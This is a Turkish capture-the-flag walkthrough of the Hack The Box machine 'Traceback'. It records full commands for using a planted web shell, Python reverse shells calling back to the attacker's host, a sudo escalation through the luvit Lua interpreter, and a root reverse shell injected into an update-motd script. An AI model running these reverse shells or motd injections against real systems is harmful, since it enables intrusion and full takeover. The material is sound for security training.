| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Traceback - HTB | Kolay | Linux |  |
Walkthrough
nmap taraması:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHttp'ye gittim ve gobuster ile hiç bir şey bulamadım. Ancak sayfanın kaynak kodlarında şöyle bir yorum vardı:
...
</style>
</head>
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
...Bunun üzerine internette web shell'ler ile ilgili aramalar yapmaya başladım. https://gist.githubusercontent.com/sbnsec/352128ea5bd8c95f48d748d5f25e3639/raw/a2aeda5d66c4776da4cc5d0736021d7fe54a5332/webshell-list.txt adresindeki wordlist'i kullanarak tekrar bir gobuster denedim.
┌──(root💀kali)-[/home/…/Desktop/HTB/Linux/Traceback]
└─# gobuster dir --url http://10.10.10.181 --add-slash --expanded --follow-redirect --no-error --wordlist webshell-list.txt -t 50| tee gobuster2
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.181
[+] Method: GET
[+] Threads: 50
[+] Wordlist: webshell-list.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/09/10 13:05:25 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.181/smevk.php/ (Status: 200) [Size: 1261]
===============================================================
2021/09/10 13:05:28 Finished
===============================================================Bir web shell buldum ve içeriye admin:admin ile giriş yaptım.
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",1111));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' payload'ı ile kendime reverse aldım. İçeride incelemeler yaparken sysadmin kullanıcısı haklarında şifresiz bir şekilde bir binary kullanabileceğimi gördüm. Aynı zamanda bir not'da buldum.
╔══════════╣ Files inside /home/webadmin (limit 20)
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Apr 22 06:08 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 2020 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Apr 22 06:08 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 2020 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvitwebadmin@traceback:/home/webadmin$ cat note.txt
cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.Bunun üzerine internette lua ile yazılmış shell kodlar aramaya başladım. Bunu bit dosyaya kaydedip çalıştırdım.
webadmin@traceback:/tmp$ echo "os.execute('/bin/sh')" > lua_reverse.lua
echo "os.execute('/bin/sh')" > lua_reverse.lua
webadmin@traceback:/tmp$ sudo -u sysadmin /home/sysadmin/luvit -i /tmp/lua_reverse.lua
<sadmin /home/sysadmin/luvit -i /tmp/lua_reverse.lua
$ id
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$
Güzel! İlk flagimizi okuyalım.
sysadmin@traceback:~$ ls
ls
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 2020 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Apr 20 08:40 .ssh
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw------- 1 sysadmin sysadmin 33 Sep 11 15:34 user.txt
sysadmin@traceback:~$ cat user.txt
cat user.txt
1876d7894f884e005f1d703b3dd63221İncelemeler yapmaya devam ederken /etc/update-motd.d/ altına yazabildiğimi gördüm.
══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group sysadmin:
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/80-esm
/home/webadmin/note.txt
/tmp/linpeas.sh
/tmp/resultssh ile bir bağlantı yaptığımda banner çıkıyordu bunu header sayesinde yapuyor. Buraya bir reverse yazdım ve tekrar ssh attım. pspy ile incelediğimde bu süreçlerin root olarak çalıştığını görmüştüm.
sysadmin@traceback:/tmp$ echo "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.18\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'" >> /etc/update-motd.d/00-header┌──(root💀kali)-[/home/kali/Desktop/HTB]
└─# ssh [email protected] -i /root/.ssh/id_rsa 130 ⨯
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################┌──(root💀kali)-[~]
└─# nc -lvp 9999 1 ⨯
listening on [any] 9999 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.181] 49408
root@traceback:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@traceback:/# cd /root
cd /root
root@traceback:/root# ls
ls
root.txt
root@traceback:/root# cat root.txt
cat root.txt
bc51332d9d90cd8f554799e7534fc2f3
root@traceback:/root# Kolay makine!
İlk Yorumu Siz Yapın